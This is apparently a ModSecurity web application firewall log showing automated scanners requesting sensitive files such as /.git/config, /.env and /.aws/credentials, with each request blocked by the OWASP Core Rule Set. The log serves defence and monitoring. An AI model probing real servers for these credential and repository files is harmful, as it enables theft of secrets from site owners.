[Tue Aug 06 18:22:04.417252 2024] [:error] [pid 970076] [client 45.148.10.206:60910] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrJNrPiEYCqf1H3z3zPnOwAAAAM"]
[Tue Aug 06 18:22:04.418041 2024] [:error] [pid 970076] [client 45.148.10.206:60910] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrJNrPiEYCqf1H3z3zPnOwAAAAM"]
[Tue Aug 06 18:22:04.418562 2024] [:error] [pid 970076] [client 45.148.10.206:60910] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrJNrPiEYCqf1H3z3zPnOwAAAAM"]
[Wed Aug 07 09:49:26.204894 2024] [:error] [pid 993077] [client 45.148.10.142:60996] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrMnBpP8N5D8LcrWraiUiwAAAAE"]
[Wed Aug 07 09:49:26.205551 2024] [:error] [pid 993077] [client 45.148.10.142:60996] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrMnBpP8N5D8LcrWraiUiwAAAAE"]
[Wed Aug 07 09:49:26.205967 2024] [:error] [pid 993077] [client 45.148.10.142:60996] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrMnBpP8N5D8LcrWraiUiwAAAAE"]
[Wed Aug 07 19:17:36.841880 2024] [:error] [pid 993080] [client 45.148.10.206:38012] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrOsMLR7kO5nMtpmRW3y5QAAAAQ"]
[Wed Aug 07 19:17:36.842822 2024] [:error] [pid 993080] [client 45.148.10.206:38012] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrOsMLR7kO5nMtpmRW3y5QAAAAQ"]
[Wed Aug 07 19:17:36.843285 2024] [:error] [pid 993080] [client 45.148.10.206:38012] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrOsMLR7kO5nMtpmRW3y5QAAAAQ"]
[Thu Aug 08 01:50:58.741029 2024] [:error] [pid 1013108] [client 45.148.10.59:56944] [client 45.148.10.59] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrQIYvxjwB_FHawoGUJhDwAAAAc"]
[Thu Aug 08 01:50:58.741857 2024] [:error] [pid 1013108] [client 45.148.10.59:56944] [client 45.148.10.59] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrQIYvxjwB_FHawoGUJhDwAAAAc"]
[Thu Aug 08 01:50:58.742284 2024] [:error] [pid 1013108] [client 45.148.10.59:56944] [client 45.148.10.59] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrQIYvxjwB_FHawoGUJhDwAAAAc"]
[Thu Aug 08 15:02:59.856508 2024] [:error] [pid 1015474] [client 45.148.10.206:56678] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrTCA1zA6IHfAVbtJPnxZgAAAAU"]
[Thu Aug 08 15:02:59.856776 2024] [:error] [pid 1015474] [client 45.148.10.206:56678] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrTCA1zA6IHfAVbtJPnxZgAAAAU"]
[Thu Aug 08 15:02:59.856929 2024] [:error] [pid 1015474] [client 45.148.10.206:56678] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZrTCA1zA6IHfAVbtJPnxZgAAAAU"]
[Thu Aug 08 15:19:39.197982 2024] [:error] [pid 1015470] [client 45.148.10.59:49180] [client 45.148.10.59] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZrTF64mpe0089Q4vms-aDgAAAAE"]
[Thu Aug 08 15:19:39.198299 2024] [:error] [pid 1015470] [client 45.148.10.59:49180] [client 45.148.10.59] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZrTF64mpe0089Q4vms-aDgAAAAE"]
[Thu Aug 08 15:19:39.198461 2024] [:error] [pid 1015470] [client 45.148.10.59:49180] [client 45.148.10.59] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZrTF64mpe0089Q4vms-aDgAAAAE"]
[Sun Aug 11 02:45:07.703311 2024] [:error] [pid 1091646] [client 83.147.52.49:36274] [client 83.147.52.49] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "ZrgJk9U5maImQVr84GzGogAAAA8"]
[Sun Aug 11 02:45:07.705082 2024] [:error] [pid 1091646] [client 83.147.52.49:36274] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "ZrgJk9U5maImQVr84GzGogAAAA8"]
[Sun Aug 11 02:45:07.705259 2024] [:error] [pid 1091646] [client 83.147.52.49:36274] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "ZrgJk9U5maImQVr84GzGogAAAA8"]
[Sun Aug 11 02:45:07.708288 2024] [:error] [pid 1092088] [client 83.147.52.49:36276] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrgJk9DFIR22WuBKgzSnVwAAAAM"]
[Sun Aug 11 02:45:07.708464 2024] [:error] [pid 1092088] [client 83.147.52.49:36276] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrgJk9DFIR22WuBKgzSnVwAAAAM"]
[Sun Aug 11 02:45:07.708639 2024] [:error] [pid 1092088] [client 83.147.52.49:36276] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrgJk9DFIR22WuBKgzSnVwAAAAM"]
[Sun Aug 11 02:45:07.709830 2024] [:error] [pid 1091692] [client 83.147.52.49:36262] [client 83.147.52.49] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZrgJk3QUBqj9DniSAJ-M_QAAAAA"]
[Sun Aug 11 02:45:07.709988 2024] [:error] [pid 1091692] [client 83.147.52.49:36262] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZrgJk3QUBqj9DniSAJ-M_QAAAAA"]
[Sun Aug 11 02:45:07.710125 2024] [:error] [pid 1091692] [client 83.147.52.49:36262] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZrgJk3QUBqj9DniSAJ-M_QAAAAA"]
[Sun Aug 11 02:45:07.718071 2024] [:error] [pid 1091645] [client 83.147.52.49:36314] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZrgJk2IvoiI_9ILRzbVdcAAAAA4"]
[Sun Aug 11 02:45:07.718227 2024] [:error] [pid 1091645] [client 83.147.52.49:36314] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZrgJk2IvoiI_9ILRzbVdcAAAAA4"]
[Sun Aug 11 02:45:07.718382 2024] [:error] [pid 1091645] [client 83.147.52.49:36314] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZrgJk2IvoiI_9ILRzbVdcAAAAA4"]
[Sun Aug 11 02:45:07.799548 2024] [:error] [pid 1091648] [client 83.147.52.49:36328] [client 83.147.52.49] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZrgJk5N99bIqmNuqzXxG5gAAAGg"]
[Sun Aug 11 02:45:07.799778 2024] [:error] [pid 1091648] [client 83.147.52.49:36328] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZrgJk5N99bIqmNuqzXxG5gAAAGg"]
[Sun Aug 11 02:45:07.799945 2024] [:error] [pid 1091648] [client 83.147.52.49:36328] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZrgJk5N99bIqmNuqzXxG5gAAAGg"]
[Sun Aug 11 02:45:07.806754 2024] [:error] [pid 1091701] [client 83.147.52.49:36344] [client 83.147.52.49] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "ZrgJk1kjVI3jtUjkNPjniQAAAAE"]
[Sun Aug 11 02:45:07.806949 2024] [:error] [pid 1091701] [client 83.147.52.49:36344] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "ZrgJk1kjVI3jtUjkNPjniQAAAAE"]
[Sun Aug 11 02:45:07.807100 2024] [:error] [pid 1091701] [client 83.147.52.49:36344] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "ZrgJk1kjVI3jtUjkNPjniQAAAAE"]
[Sun Aug 11 02:45:07.816327 2024] [:error] [pid 1091644] [client 83.147.52.49:36320] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrgJk1iTXy60VuiutUunWwAAAA0"]
[Sun Aug 11 02:45:07.816489 2024] [:error] [pid 1091644] [client 83.147.52.49:36320] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrgJk1iTXy60VuiutUunWwAAAA0"]
[Sun Aug 11 02:45:07.816629 2024] [:error] [pid 1091644] [client 83.147.52.49:36320] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrgJk1iTXy60VuiutUunWwAAAA0"]
[Sun Aug 11 02:45:07.898586 2024] [:error] [pid 1091648] [client 83.147.52.49:36328] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZrgJk5N99bIqmNuqzXxG5wAAAGg"]
